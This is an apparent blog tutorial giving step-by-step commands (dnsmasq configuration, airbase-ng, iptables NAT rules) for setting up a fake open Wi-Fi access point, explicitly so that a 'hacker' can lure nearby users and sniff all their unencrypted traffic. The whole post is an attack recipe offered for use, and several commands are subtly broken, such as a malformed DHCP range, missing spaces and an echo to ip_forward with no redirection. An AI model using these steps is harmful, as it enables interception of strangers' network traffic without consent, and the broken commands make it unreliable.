CREATING FAKE ACCESS POINT(AP)
[THEORY]
Fake access ponit have a large application in a hackers life , It will attract more clients ,
many of them will automatically connect to it, so that we can sniff all the packets created by
the clients that connect to it and since our fake access point is an open one the traffic will
not be encrypted.giving an internet connections on your access point can attract more people
to it..
the main things we needed for it is our lab , 2 cards(one should be connected to the internet,
the other acts as the AP) THE ONE CARD CAN BE OF ANY TYPE(WIRED/WIRELESS) and THE OTHER SHOULD BE
A WIRELESS CARD INORDER TO BEHAVE AS AN ACCESS POINT.
MEATHOD 1:
>ifconfigto check did both the cards are available in our device
>enable monitor mode
you only need to do this once........................
step 1: install dnsmasq
>apt-get install dnsmasq
step 2:modifing configuration for dnsmasq
make sure that wehave the dnsmasq configuration file
>ls /etc/dnsmasq.conf
now we have to add the range of the ip addresses that can connect to our AP and we have to add the interface name in the file
>echo -e "interface=bakkr\ndhcp-range=192.168.0.50,192.168.0.150.12h" >/etc/dnsmasq.conf
step 3: now we are going to start the access point using the tool called airbase-ng
>airbase-ng -e [network name] -c [channel number] [interface]
the only problem withis access point is it is not connected with internet
now lets connect it so now we need to lik those two cards together through our lab
step 1: make our fake interface active
>ifconfig bakkr192.168.0.1 up
step 2:now we need to remove /flush out all the rules from iptables
iptables is a type of firewall system used in linux /it may some times prevent as from creating our fake AP
>iptables --flush
>iptables --table nat --flush
>iptables --delete-chain
>iptables --table nat --delete-chain
step 3:enable packet forward though your device
>iptables -P FORWARD ACCEPT
step 4:Linking our both cards
>iptables -t nat -A POSTROUTING -o [internet interface name] -j MASQUERADE
step 5:start dnsmasq
>dnsmasq
step 6:enable ip forward which will again allow packets to flow through your network
>echo "1" /proc/sys/net/ipv4/ip_forward
you can also create a fake access point using the tool named mana-toolkit i will explain about it latter
Comments
Post a Comment